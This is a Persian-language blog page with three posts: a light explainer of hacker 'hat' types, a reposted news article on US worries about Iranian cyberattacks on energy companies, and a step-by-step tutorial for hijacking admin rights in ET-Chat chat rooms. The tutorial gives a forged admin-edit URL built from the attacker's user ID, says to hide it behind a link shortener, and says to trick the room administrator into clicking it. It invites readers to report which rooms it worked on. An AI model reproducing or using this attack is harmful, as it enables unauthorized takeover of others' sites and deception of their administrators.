يه چيزايي كه فكر شم نمي كني

هکر کلاه سفید و هکر کلاه سیاه

هكر ها چند نوع هستند ، ممكن است كلاه سفید یا كلاه سیاه باشند . در این مقاله با تعریف انواع هكرها آشنا می شویم و اینكه آنها چه هدفی را دنبال می كنند .


1- گروه نفوذگران کلاه سفید: (white hat hackers) : هر کسی که با دانش خود بتواند از سد موانع امنیتی یک شبک بگذرد و به داخل شبکه راه پیدا کند اما اقدام خرابکارانه ای انجام ندهد را یک هکر کلاه سفید می خوانند. خب حتما می گویید عجب ترجمه سختی ما که هیچ نفهمیدیم. عجله نکنید. اینم مثال راحتش. تصور کنید دانشجویی که در یک دانشگاه درس می خونه و می دونه تمامی لیست حضور و غیاب و نمرات دانشجوها در کامپیوتری در اتاق شبکه دانشگاه قرار داره. حالا این دانشجوی کنجکاو ما برای اینکه سر و گوشی آب داده باشه مدتها روی شبکه دانشگاه کار می کنه و از راه های مختلف( که خارج از بحث و حوصله این مقاله است و اگر بخوام راستش رو بگم میشه  100  ها کتاب راجعش نوشت) وارد اون شبکه میشه. یعنی به طور معمول هیچ دانشجویی حق نداره بتونه نمراتش رو ببینه ولی این پسر ناقلای ما یه جورایی وارد شبکه میشه و نمراتش رو می بینه و همچنین حضور و غیابش رو. خب این پسر ناقلا یک هکره. چون این پسر ناقلا فقط نمرات رو می بینه و دست کاری نمی کنه(لابد وجدانش اجازه نمی ده) یک هکر کلاه سفید میشه.
به عنوان مثالی دیگر هکرهای کلاه سفید متخصصین شبکه ای هستند که سوراخهای امنیتی شبکه را پیدا می کنند و به مسوولان گزارش می دهند. مثلا این دانشجوی ناقلا می تونه بره به مسوول شبکه بگه که چطوری وارد سیستمش شده( چون حتما یه ضعفی داشته دیگه) بعدش اونا هم بهش قاقالیلی میدن!


2-گروه نفوذگران کلاه سیاه (Black hat hackers) : به این گروه کراکر –Cracker- می گویند. این افراد آدمهایی هستند که با دانشی که دارند وارد کامپیوتر قربانی خود شده و به دستکاری اطلاعات و یا جاسوسی کردن و یا پخش کردن ویروس و غیرو می پردازند. مثلا همون دانشجوی ناقلای مثال بالا اگر بره داخل شبکه و نمراتش رو عوض کنه و به خودش همش بیست بده و یا روی تمام سیستمهای دانشگاه ویروس بندازه دیگه میشه یک کراکر. پس آقایون و خانومها دانش یک شخص می تونه در جهت مثبت به کار بره یا منفی. لب کلام اینکه اگر اون شخص آدم خوبی بود و تو شبکه دست کاری نکرد بهش میگن کلاه سفید اگر شرور بود و عشق خرابکاری بهش می گن کلاه سیاه. مثل یه آدمی تصور کنید که کشتی گیره. اگر هوای ضعیف ضعفا رو داشته باشه بهش میگن پهلوون اما اگر قلدر بازی واسه همه در بیاره مردم بهش می گن لات و چماق کش!


3-گروه نفوذگران کلاه خاکستری (gray hat hackers) : خب شاید سخت ترین کار توصیف حوزه این گروه از نفوذگرهاست. به این نفوذگرها بعضا whacker  هم می گویند( البته زیاد مصطلح نیست فقط برای اطلاع بدانید). این گروه از نفوذگرها بنا به تعریفی حد وسط دو تعریف گذشته هستن. یعنی گاهی شیطنت می کنن و توی سیستم خرابکاری می کنن و گاهی خرابکاری نمی کنن! یعنی اینکه هم
کلاه سفیدن هم کلاه سیاه واسه همین رنگشون رو قاطی کردن شده خاکستری! بنا به تعریف دیگه کلاه خاکستری ها شیطونی هاشون هم عامه پسنده یعنی اگر بخوان خرابکاری کنن در جهت اطلاع عموم انجام میدن و به قول معروف فی سبیل الله و برای مردم. مثلا اون دانشجوئه مثال بالا اگه بیاد یه نسخه از لیست حضور و غیاب رو به ایمیل تمام دانشجویان دیگه بزنه و بگه برید حالا حالش رو ببرید و ببینید هرکی چقدر غیبت داره و نمره تحقیقش چند شده.

4- گروه نفوذگران کلاه صورتی ( pink hat hackers): خب این دسته بندی به ندرت دیده شده و اکثر مواقع کلاه صورتی ها رو جزیی از کلاه سیاه ها می دونند. به زبان شیرین فارسی اینها همون جوجه هکرها هستند! این افراد آدمهای کم سوادی هستند که فقط با چند نرم افزار به خرابکاری و آزار و اذیت بقیه اقدام می کنن. مثلا شماها رو توی مسنحر یاهو بوت می کنن و یا توی چت رومها خرابکاری می کنن و یا با نرم افزارهای آماده ایی مثل ساب سون و غیرو اقدام به هک کردن بقیه می کنن و از این قبیل. بنابراین به کلاه صورتی ها می گیم جوجه هکر!




تاریخ: سه شنبه 28 خرداد 1392برچسب:,
ارسال توسط حامدآقاعلی

هكرهاي ايراني پدر آمريكارو در آوردن!!

با توجه به نگراني روزافزون دولت اوباما، کاخ سفيد ماه پيش يک جلسه‌ي مهمي را براي بررسي راهکارهاي مديريت خطر حملات سايبري ايران ترتيب داد.
به گزارش ونگ وا به نقل از مشرق، به دنبال افزايش حملات سايبري ايران عليه شرکت‌هاي آمريکايي، مقامات آمريکا همواره نگران خرابي‌هايي هستند که اين حملات مي‌توانند بر جاي بگذارند، چرا که معتقدند بر خلاف حملات هکرهاي چيني که با قصد سرقت اطلاعات انجام مي‌شوند، اين حملات قصد ويران کردن و آسيب زدن به تاسيسات اين کشور را دارند.

انديشکده آمريکايي شوراي آتلانتيک در مقاله‌‌اي ضمن بررسي نگراني‌هاي مقامات سابق و فعلي دولت آمريکا نسبت به حملات سايبري ايران عليه شرکت‌هاي انرژي اين کشور، به اين موضوع اشاره دارد که اين اقدامات ايران مي‌تواند آن‌ها را در معرض حملات انتقامي آمريکا قرار دهد. نويسنده با استناد به صحبت‌هاي مقامات آمريکايي، از جمله لئون پانتا، بر اين باور است که حملات اخير عليه تاسيسات آرامکو در عربستان مي‌تواند نشان از عزم جدي ايران براي آسيب زدن به شرکت‌هاي آمريکايي داشته باشد.

*هکرهاي ايران حملات سايبري خود به شرکت‌ها آمريکايي را وسعت بخشيده‌اند

بنا به گفته‌ي مقامات اسبق و فعلي آمريکا، هکرهاي جمهوري اسلامي ايران ميزان حملات سايبري خود به شرکت‌ها آمريکايي را وسعت بخشيده‌اند که البته اين کار را از طريق انجام عمليات‌هاي نفوذي و تجسس در سيستم‌هاي شبکه‌اي شرکت‌هاي فعال در بخش انرژي انجام مي‌دهند. در آخرين عمليات‌ها، هکرهاي ايراني موفق شدند تا به نرم افزار کنترل سيستمي دست پيدا کنند که به آن‌ها اجازه مي‌داد در خط لوله‌هاي نفت و گاز دستکاري هايي را انجام دهند. يکي از مقامات سابق آمريکا مي‌گويد: آن‌ها تا جايي پيش رفتند که موجب نگراني مردم شدند.

*اهداف هکرهاي ايراني با هکرهاي چيني کاملاً متفاوت است

اين پيشرفت‌ها نشان مي‌دهند در حالي که هکرهاي چيني بيشتر به دنبال سرقت اطلاعات و اقدامات جاسوسي هستند، حملات هکرهاي ايراني نگراني‌هاي بيشتري را برانگيخته است، چرا که با نيت دشمني آشکار و پتانسيل ايجاد ويراني انجام مي‌شوند. مقامات آمريکا اين سري از نفوذ هکرهاي ايراني را نگران کننده تر از حملات مستمر ديگر مي‌دانند، و معتقدند که اين حملات که توسط حکومت تهران پشتيباني مي‌شوند مي‌توانند در ارائه‌ي سرويس بانک‌ها از طريق وب سايت اختلال ايجاد کنند. مقامات آمريکا مي‌گويند برخلاف حملات گذشته، اين حملات جديد موفق شده‌اند تا به منظور جمع آوري اطلاعات در مورد اقدامات کنترلي شرکت‌ها، به سيستم‌هاي کامپيوتري نفوذ کنند و موفق شده‌اند تا ابزار لازم براي ويران کردن و يا مختل کردن آن‌ها در آينده را به دست بياورند.

*مقامات آمريکايي به طور دقيق به جزئيات مدارک دخالت ايران در اين حملات اشاره نمي‌کنند

درعوض مقامات آمريکايي هشدار مي‌دهند که ايران در حال نزديک شدن به اقدامات انتقام جويانه‌ي آمريکاست. يک مقام آمريکايي مي‌گويد: «اين اقدامات نشان از افزايش حملات سايبري حکومت ايران دارد و هر چقدر که بيشتر اين کار را انجام بدهند، بيشتر موجب نگراني ما خواهند شد. کارهايي که آن‌ها تا کنون انجام داده‌اند مورد توجه قرار گرفته است، و آن‌ها بايد هشيار و محتاط باشند ...» اين مقامات فعلي و سابق، اسمي از شرکت‌هاي انرژي که مورد حمله قرار گرفته‌اند، نبرده اند؛ و يا اين که در مورد تعداد آن‌ها صحبت کنند. دو مقام سابق مي‌گويند: در ميان آن‌ها مي‌توان به شرکت‌هاي نفت و گاز در امتداد مرز کانادا اشاره کرد، جايي که خيلي از نهادها مشغول فعاليت هستند.

*مقامات ارشد اطلاعاتي امريکا نسبت به توانايي هکرهاي ايراني غافل بودند

اين مقامات هم چنين به صورت دقيق به جزئيات شواهد دخالت ايران اشاره نمي‌کنند. اما يک مقام سابق آمريکا مي‌گويد: شواهد فني وجود دارد که اين حملات سايبري به شرکت‌هاي انرژي را مستقيماً به ايران وصل مي‌کند. در ماه‌هاي اخير، نگراني مقامات آمريکايي نسبت به آن چه که مقامات دفاعي کشور آن را حملات سايبري مستمر دولت ايران و سپاه قدس اين کشور مي‌خوانند، افزايش يافته است. اين خطر به سرعت رشد کرده است. تا همين ?? ماه پيش، مقامات ارشد اطلاعاتي کشور نسبت به توانايي هکرهاي ايراني غافل بودند.

*تشکيل جلسه‌ي کاخ سفيد به منظور بررسي راه‌هاي مقابله با حملات سايبري ايران

با توجه به نگراني روزافزون دولت اوباما، کاخ سفيد ماه پيش يک جلسه‌ي مهمي را براي بررسي راهکارهاي مديريت خطر حملات سايبري ايران ترتيب داد. در آن جلسه هيچ تصميم مهمي براي برداشتن گام‌هاي جدي گرفته نشد، اما به گفته‌ي يکي از مقامات آمريکايي، آن‌ها قرار است تا براي ارزيابي مجدد اين موضوع جلساتي را طي هفته‌هاي آينده برگزار کنند.

* اين حملات سايبري موجب نگراني مردم آمريکا شده است

در ماه اکتبر، لئون پانتا، وزير دفاع سابق آمريکا، نسبت به خطر پنهان ايران هشدار داد، که البته در سخنانش اسمي از هيچ کشوري نبرد، و فقط خاطر نشان کرد که حمله‌ي هکرها به تاسيسات آرامکو در عربستان نشان از افزايش جنگ‌هاي سايبري خواهد داشت. از آن زمان تاکنون بر تعداد حملات سايبري ايران افزوده شده است. بر خلاف هکرهاي چيني، نفوذ و حمله‌ي هکرهاي ايراني با هدف اختلال و يا آسيب به سيستم‌هاي کامپيوتري انجام مي‌شود. يک مقام آمريکايي مي‌گويد سرقت و ايجاد اختلال، نگراني‌هاي مختلفي را به وجود آورده است. به همين خاطر است که آن‌ها توجه زيادي را به خود جلب کرده‌اند.



تاریخ: سه شنبه 28 خرداد 1392برچسب:,
ارسال توسط حامدآقاعلی


خب ابتدا وارد یه چت رومی بشین که //را تو چت نبسته باشه مثلا وقتی //رو میزنید شکلک نیاد یا بتونید لینک کامل بدین
خب وقتی وارد شدین اسمتون رو ثبت کنید
سپس وقتی اسمتون رو ثبت کردین از روم خارج بشین دوباره وارد بشین
خب حالا شما کاربر عضو شدین
خب شما ابتدا باید یوزر کد خود را پیدا کنید
خب چطوری یوزر خود را پیدا کنیم کلید کنترل یو رو بزنید(ctrl+u)
خب الان یه صفحه خواهد شد که کد هایی همانند کد های زیر دارد
 در اینجا من با اسم امید تنها وارد روم شدم میخوام کد کاربریم رو بردارم
این جا کد کاربری من با رنگ قرمز مشخص شده


window.onload = function() {
    var chatObj = new ET_Chat();
    chatObj.messages_im_chat=22;
    chatObj.reload_interval=4000;
    chatObj.username='امید تنها';
    chatObj.user_id='3';
    chatObj.userPrivilegienGlobal='admin';
    chatObj.win_style='etchat_white';
    chatObj.anbindung_an_userverwaltung=false;


خب حالا یوزر ای دی من 3هست این یوزر ای دی به چه دردی میخوره؟
خب  حالا چطوری خودمون رو مدیر کنیم
خب به این آدرس توجه کنید
http://آدرس چت رومی که میخواین هک کنید رو اینجا بزنید/?AdminRegUserEdit&admin&id=
بعد وقتی که ادرس چت رومو زدین جلوی مساوی باید یوزر کد خود رو بزنید
مثلا واسه من یوزر کدم 3هست خب کد این شکلی میشه
http://adres-chat-rom-ke-mikhay-hack-koni/?AdminRegUserEdit&admin&id=3
خب حالا این کد خیلی طولانیه چیکار کنیم که کوتاه بشه ما نیاز به یه کوتاه کننده لینک داریم
یه سایتی هست به نشانیه
www.tinylink.ir
وارد این سایت بشین سپس این متن رو بزنید توش و کوتاهش کنید حالا وقتی کوتاه کننده شده رو بدین به مدیر چت روم و روش کلید کنه شما مدیر میشی

جان من چه جواب داد چه نداد نظر بده و بگو کدوم روم بوده
 




تاریخ: یک شنبه 26 خرداد 1392برچسب:هك ,هك مدير,
ارسال توسط حامدآقاعلی
آخرین مطالب

صفحه قبل 1 صفحه بعد

آرشیو مطالب
پيوند هاي روزانه
امکانات جانبی

<-PollName->

<-PollItems->

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 13
بازدید دیروز : 0
بازدید هفته : 62
بازدید ماه : 368
بازدید کل : 157109
تعداد مطالب : 76
تعداد نظرات : 0
تعداد آنلاین : 1



Alternative content


Untitled Document
چت روم با حال